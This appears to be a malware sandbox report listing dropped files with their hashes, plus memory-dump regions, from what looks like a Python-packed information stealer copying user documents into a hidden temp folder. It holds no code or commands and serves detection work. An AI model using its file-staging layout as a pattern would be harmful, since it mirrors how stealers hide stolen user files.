SHA1
d76d817cac04d830707ce97b4d0d582a988e1dbd

SHA256
b9e9569931047cd6a455ec826791c2e6c249c814dc0fa71f0bd7fa7f49b8948d

SHA512
6a5affde07b5150b5aee854851f9f68c727b0f5ba83513c294d27461546a5ef67bf6c5869fc4abdadaa9bf1767ea897910c640c5494b659a29004050c9c5d099

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\blank.aes

Filesize
120KB

MD5
a2bef122e5b11172c4265219f3c4a8df

SHA1
c4aad7b20314fe1746f8d8e0903126266bd593a3

SHA256
ae47a01d134b5620a0dd8dc4e9cec60ab7eb315fa0d4a00c648d6e3e3c410462

SHA512
207d5411df314b0a78031ae9cd3046a0e14381f7ec8f458060f78c02917d917ab529caf521534eb51f472eaf8167eb6c3ca7d44f2f5d789ee6d08e2ec2334a05

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\bound.blank

Filesize
177KB

MD5
0b0a042258109ffa0272ef5658722e54

SHA1
5224d46a23c075c82978271ecc8496b86f3c1eb4

SHA256
e95dc4b655220df1ce9456d29f6a0c449a275b45883a28cce0d1dce4cda7dbb0

SHA512
9d063fe91e20b2361205ba474378488b8031ec8275e1b556d9515ca23ebd1e40b08c2e517f56c7e356117a11df26d145611b6312d64afb704daade110959f64d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\libcrypto-1_1.dll

Filesize
1.1MB

MD5
bbc1fcb5792f226c82e3e958948cb3c3

SHA1
4d25857bcf0651d90725d4fb8db03ccada6540c3

SHA256
9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47

SHA512
3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\libssl-1_1.dll

Filesize
204KB

MD5
ad0a2b4286a43a0ef05f452667e656db

SHA1
a8835ca75768b5756aa2445ca33b16e18ceacb77

SHA256
2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1

SHA512
cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\python311.dll

Filesize
1.6MB

MD5
9e985651962ccbccdf5220f6617b444f

SHA1
9238853fe1cff8a49c2c801644d6aa57ed1fe4d2

SHA256
3373ee171db8898c83711ec5067895426421c44f1be29af96efe00c48555472e

SHA512
8b8e68bbe71dcd928dbe380fe1a839538e7b8747733ba2fd3d421ba8d280a11ba111b7e8322c14214d5986af9c52ab0c75288bbb2a8b55612fb45836c56ddc36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\select.pyd

Filesize
25KB

MD5
27703f9a7c7e90e049d5542fb7746988

SHA1
bc9c6f5271def4cc4e9436efa00f231707c01a55

SHA256
fcc744cfccc1c47f6f918e66cfc1b73370d2cecdb776984fabb638745ebe3a38

SHA512
0875ad48842bbac73e59d4b0b5d7083280bde98336c8856160493cc63f7c3a419f4471f19c8537e5c8515e194c6604f9efa07d9d9af5def2f374406d316436a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\sqlite3.dll

Filesize
610KB

MD5
08ce33649d6822ff0776ede46cc65650

SHA1
941535dabdb62c7ca74c32f791d2f4b263ec7d48

SHA256
48f50e8a693f3b1271949d849b9a70c76acaa4c291608d869efe77de1432d595

SHA512
8398e54645093e3f169c0b128cbeda3799d905173c9cb9548962ecbaf3d305620f0316c7c3f27077b148b8f6d3f6146b81c53b235f04ac54668dab05b929d52f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\unicodedata.pyd

Filesize
295KB

MD5
f86f9b7eb2cb16fb815bb0650d9ef452

SHA1
b9e217146eb6194fc38923af5208119286c365ad

SHA256
b37d56ad48a70b802fb337d721120d753270dbda0854b1bfb600893fb2ce4e7a

SHA512
6c448f6d6c069ba950c555529557f678dfd17c748b2279d5eec530d7eb5db193aa1ca18dd3ce9f5220e8681a0e50b00d7de93c6744476c0e1872dafd9d5de775

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_osgj1s4n.3ru.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
348KB

MD5
ed7986cf60cce2c1f4e9e31389582da2

SHA1
a94f57eb857a7b977a04025e2f84ae4ffc0241be

SHA256
c12eb4d533976f518d4d08e2c6e3f1bfaf326c9296ce1bf19c7658a2d36fbafa

SHA512
d0c302d493cc6d388ef19888b6d3fcc076acfdfd1a35879ffbaa2057deeb843d2d9c38dc5b4e2cb520261723b2888a9efda92b5a7cfb687aaf1c4b6ba50174bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ufomwzb4\ufomwzb4.dll

Filesize
4KB

MD5
d74c0a70bb70556b694f28d490007831

SHA1
89f69e654d7121a90f6693d06956e99741ae1c85

SHA256
573bb21ea9358cfc93e6d797a08e199d023616072bf028a3d1df8c98e5ed1e25

SHA512
fc9bc86e7bb834c0222a1394f143f73cdd27b81446db47e73a7a66ec2a557bc884b664042d1671fef3b02b149c7840aecfbc6a905b013a5e1c429ebcffb572e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\vnm1MMzGt19Z.bat

Filesize
202B

MD5
36acbc412cb7cddbfa64a9c40926f295

SHA1
e3141308c66b36ad2b64b6b14b5aa7c7d7df63a5

SHA256
b62887a774ba69ec991dfda00d408c823e8c36eea2ab8c42f542473a55e3c660

SHA512
81657883e3941ac5d682d8fe80af8ebbabc7bda225aa0d4210d333ef12acd70b0a7310c2ae91d6fa3072e38a1db88d369a6ae58a237570be87d1a89b84627afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Desktop\ExitDebug.docx

Filesize
16KB

MD5
3f97749ae2ed8f539044c27f93b65782

SHA1
531099b5d8bdca22f61c6a9945b1f0e789261fe3

SHA256
2dae4e6679b1173db3c9adae5007e11ffd6b8f979ad1f7d6f97c1c68d4fc4c01

SHA512
ce9fca60e87b2d5b3ff4a76a08a8948fa1ce72c6b0dd45c9edb79eaadb0eb4d88513323c7f81a7752b5b50e18c0b74ee36d514df4471399ff5150870ba68143b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Desktop\OutConfirm.xlsx

Filesize
10KB

MD5
0ccb8c828bee97aac9b689b25d20450c

SHA1
7a270975239f43e3c299605e2d74ae2aa362304f

SHA256
63067c1d6502de31f627f8d711f940248572af001d1a6e38cc7ed1bcc5efaf07

SHA512
e0f6a6dca4a5c9ef99abc2bfa56f5473abebd24b4e555654a1f1fdf3b70b4f059d510cd2665ae8ce5ff9560bb764e0ad4a7c0b91069f7c40a5e65f143f46b8bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Desktop\ReadStop.xlsx

Filesize
11KB

MD5
2c9c9e179b7326038135d4ad7547693a

SHA1
39b0df103bd360e45a4b77066c49e7b0a05f2b4b

SHA256
5a20ce6ef89d897314026e296398c94594660e2412d8c7038a18046af8258804

SHA512
1353b4835b0461d062574003b79a26514a6ebad1ab56cc08916457df262c47c9b62bf44bddcab70e53cf558cc0b30f2ae6a9fa94f65cba6c3a76b1a498c5e7c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Desktop\StartConnect.xlsx

Filesize
10KB

MD5
4e608d94c272ca5378ed65bf33b75f5a

SHA1
752a5f537ccdeb8e1e45d6375c93d034aba91687

SHA256
05c40ac00b283b62eedf7afeea5dd7675bb78aa5cdc25b5d1b2c929b9cfed51b

SHA512
bf7c2d91dc6f825bf548d6cf42892ffd477c2ce8bcbec7a0787a3a691acf2c176c55520fa7f7f1dff94c5aa0cf233435529cf0984d09f5d7d30561712ec1c375

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Desktop\SuspendClear.docx

Filesize
15KB

MD5
f57b0e5970be48cf644f33502261069b

SHA1
e44853c12e36ecc015baa7d3a06a9ebbff6b3e90

SHA256
ca4a2d7f389586397e50e092a78d7705dfdf30f34f27cfe207e1ac3067de0972

SHA512
632cba1146e5aaabdd85ae52870490e50845e35d4a39a937ba263404f191beac23bfc4d14fc7fd47ef4b18c736e8748df46b70bc7c8f3e172cf6185d6a7f2e45

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Documents\ConfirmApprove.docx

Filesize
14KB

MD5
dbf2558949c815d2c8d2f54379e394e7

SHA1
a711bb3040ab8eca4fb8bd15a88b13f04eda14e7

SHA256
a5509a3ef83328ade2f9f358023f7b99c633558c154176f0c2761f3f107312b9

SHA512
61e6bada5c4a8a6bab3771f02ed15c03f3ae73a986a9d5cd247e45c6e593fbb806877bb9905e329cb2fcbf07c139c8506e203f704a02826685528c8163393a58

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Documents\RemoveWatch.docx

Filesize
1.1MB

MD5
44f71039dd7c2fa8c1a532f63e5d0ead

SHA1
cc6bb2d968cdab01e2196fa3e4f24948ac9ad2a6

SHA256
8e577ee8a2e1dc2b1408d5ffd9242c10854e7947ced222015793baa9346909b2

SHA512
3c7d0370915cf7fd338e446110625e07dba97b4df7ca90ca80bb4b5f1a37a72a4c57aaf96128c9915657f8a26dce0add0fca94cbf3291c884465ca0d4dd1eb3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎ \Common Files\Documents\RenameSet.docx

Filesize
12KB

MD5
c62a3080427e077734c2250c0f8287c9

SHA1
fb8a8231f80b743fc80d95858cfcb648e8b72804

SHA256
9f9943caf9106e74c92e5e699516290ae7a04b8aae58e943a0522901ddcd8f61

SHA512
d26ebd70588322b65a37df0920190f9a7d0464cf6de7c1fdbcebb311a4866d1e15b6c3fbb11cf9253523b281fde73e5629b46735b72f68724dc747b48e1b1ef0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ufomwzb4\CSCDD851B99175A43B88E67B2507DFFA8.TMP

Filesize
652B

MD5
eb90f0dce360c7e713372416ac4acdb0

SHA1
cea15fdcd15b2b0615d4fc5027854288a2aa7c80

SHA256
8fe77c807ba1fe9946c1215b067daf5d0aaa733f89a5360377e0e4fd26f1caab

SHA512
496fcb6cd2aa3c922ac6485f16787efbd95d732596dbf1944e9f176f6fcd00d5e572118b5984a25eb410625e40040abfefcaf44731bbbb195713023fbd53474c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ufomwzb4\ufomwzb4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ufomwzb4\ufomwzb4.cmdline

Filesize
607B

MD5
e40a8e76ee63d9082f572178c173b933

SHA1
74177a8b499d4d3b1a1ca8757c39de6563c3221f

SHA256
4d513f4565011655c80db6c6ff08cbabc3e182b715baf943145eae11ab23ec45

SHA512
a43a6a4c5439f724a59b44a3cd24b7d962577e7600d196b54e7ecbb1a55f7845a6f2c0932a4eb864e8fe50dad4f6a65ce34332bbeeecea690005887d51d9c42d

Download Submit
memory/8-326-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp

Filesize
5.9MB

Download
memory/8-33-0x00007FFA502E0000-0x00007FFA502EF000-memory.dmp

Filesize
60KB

Download
memory/8-338-0x00007FFA4BA80000-0x00007FFA4BA94000-memory.dmp

Filesize
80KB

Download
memory/8-339-0x00007FFA4ACF0000-0x00007FFA4ACFD000-memory.dmp

Filesize
52KB

Download
memory/8-116-0x00007FFA4AC60000-0x00007FFA4AC83000-memory.dmp

Filesize
140KB

Download
memory/8-76-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp

Filesize
140KB

Download
memory/8-73-0x00007FFA49B30000-0x00007FFA49BE8000-memory.dmp

Filesize
736KB

Download
memory/8-340-0x00007FFA463E0000-0x00007FFA464FC000-memory.dmp

Filesize
1.1MB

Download
memory/8-341-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp

Filesize
140KB

Download
memory/8-137-0x00007FFA46500000-0x00007FFA46670000-memory.dmp

Filesize
1.4MB

Download
memory/8-342-0x00007FFA502E0000-0x00007FFA502EF000-memory.dmp

Filesize
60KB

Download
memory/8-343-0x00007FFA4AD00000-0x00007FFA4AD2D000-memory.dmp

Filesize
180KB

Download
memory/8-181-0x00007FFA4BB40000-0x00007FFA4BB59000-memory.dmp

Filesize
100KB

Download
memory/8-68-0x00007FFA4AC30000-0x00007FFA4AC5E000-memory.dmp

Filesize
184KB

Download
memory/8-66-0x00007FFA4FDE0000-0x00007FFA4FDED000-memory.dmp

Filesize
52KB

Download
memory/8-75-0x000002B00F1C0000-0x000002B00F539000-memory.dmp

Filesize
3.5MB

Download
memory/8-74-0x00007FFA41360000-0x00007FFA416D9000-memory.dmp

Filesize
3.5MB

Download
memory/8-344-0x00007FFA50270000-0x00007FFA50289000-memory.dmp

Filesize
100KB

Download
memory/8-64-0x00007FFA4BB40000-0x00007FFA4BB59000-memory.dmp

Filesize
100KB

Download
memory/8-62-0x00007FFA46500000-0x00007FFA46670000-memory.dmp

Filesize
1.4MB

Download
memory/8-345-0x00007FFA4AC60000-0x00007FFA4AC83000-memory.dmp

Filesize
140KB

Download
memory/8-60-0x00007FFA4AC60000-0x00007FFA4AC83000-memory.dmp

Filesize
140KB

Download
memory/8-58-0x00007FFA50270000-0x00007FFA50289000-memory.dmp

Filesize
100KB

Download
memory/8-276-0x00007FFA4AC30000-0x00007FFA4AC5E000-memory.dmp

Filesize
184KB

Download
memory/8-278-0x00007FFA49B30000-0x00007FFA49BE8000-memory.dmp

Filesize
736KB

Download
memory/8-279-0x00007FFA41360000-0x00007FFA416D9000-memory.dmp

Filesize
3.5MB

Download
memory/8-56-0x00007FFA4AD00000-0x00007FFA4AD2D000-memory.dmp

Filesize
180KB

Download
memory/8-346-0x00007FFA46500000-0x00007FFA46670000-memory.dmp

Filesize
1.4MB

Download
memory/8-30-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp

Filesize
140KB

Download
memory/8-26-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp

Filesize
5.9MB

Download
memory/8-80-0x00007FFA4AD00000-0x00007FFA4AD2D000-memory.dmp

Filesize
180KB

Download
memory/8-84-0x00007FFA463E0000-0x00007FFA464FC000-memory.dmp

Filesize
1.1MB

Download
memory/8-81-0x00007FFA4ACF0000-0x00007FFA4ACFD000-memory.dmp

Filesize
52KB

Download
memory/8-78-0x00007FFA4BA80000-0x00007FFA4BA94000-memory.dmp

Filesize
80KB

Download
memory/8-292-0x000002B00F1C0000-0x000002B00F539000-memory.dmp

Filesize
3.5MB

Download
memory/8-311-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp

Filesize
5.9MB

Download
memory/8-317-0x00007FFA46500000-0x00007FFA46670000-memory.dmp

Filesize
1.4MB

Download
memory/8-312-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp

Filesize
140KB

Download
memory/8-72-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp

Filesize
5.9MB

Download
memory/8-351-0x00007FFA41360000-0x00007FFA416D9000-memory.dmp

Filesize
3.5MB

Download
memory/8-350-0x00007FFA49B30000-0x00007FFA49BE8000-memory.dmp

Filesize
736KB

Download
memory/8-349-0x00007FFA4AC30000-0x00007FFA4AC5E000-memory.dmp

Filesize
184KB

Download
memory/8-348-0x00007FFA4FDE0000-0x00007FFA4FDED000-memory.dmp

Filesize
52KB

Download
memory/8-347-0x00007FFA4BB40000-0x00007FFA4BB59000-memory.dmp

Filesize
100KB

Download
memory/2216-113-0x0000000000900000-0x000000000095E000-memory.dmp

Filesize
376KB

Download
memory/2216-140-0x00000000068B0000-0x00000000068BA000-memory.dmp

Filesize
40KB

Download
memory/2216-138-0x0000000006540000-0x000000000657C000-memory.dmp

Filesize
240KB

Download
memory/2216-125-0x0000000005850000-0x0000000005862000-memory.dmp

Filesize
72KB

Download
memory/2216-124-0x0000000005440000-0x00000000054A6000-memory.dmp

Filesize
408KB

Download
memory/2216-115-0x00000000053A0000-0x0000000005432000-memory.dmp

Filesize
584KB

Download
memory/2216-114-0x0000000005880000-0x0000000005E26000-memory.dmp

Filesize
5.6MB

Download
memory/3996-95-0x0000029BE0440000-0x0000029BE0462000-memory.dmp

Filesize
136KB

Download
memory/4212-219-0x000002091AD60000-0x000002091AD68000-memory.dmp

Filesize
32KB

Download